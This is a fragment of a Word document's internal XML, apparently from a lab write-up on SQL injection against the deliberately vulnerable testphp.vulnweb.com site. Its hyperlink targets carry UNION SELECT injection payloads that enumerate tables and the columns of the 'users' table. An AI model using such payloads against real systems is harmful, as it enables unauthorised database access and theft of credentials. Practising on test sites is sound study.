Target="http://testphp.vulnweb.com/login.php" TargetMode="External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hyperlink" Target="http://testphp.vulnweb.com/login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testphp.vulnweb.com/listproducts.php?cat=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testphp.vulnweb.com/listproducts.php?cat=1%20union%20select%201,table_name,3,4,5,6,7,8,9,10,11%20from%20information_schema.tables%20where%20table_schema=%27acuart%27" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testphp.vulnweb.com/listproducts.php?cat=1%20union%20select%201,column_name,3,4,5,6,7,8,9,10,11%20from%20information_schema.columns%20where%20table_name=%27users%27" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testphp.vulnweb.com/userinfo.php" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testphp.vulnweb.com/guestbook.ph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testphp.vulnweb.com/listproducts.php?cat=1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1F555-9DEB-4125-B703-58140D61A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26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21</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-01-02T03:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-01-02T18:10:00Z</dcterms:modified>
</cp:coreProperties>
</file>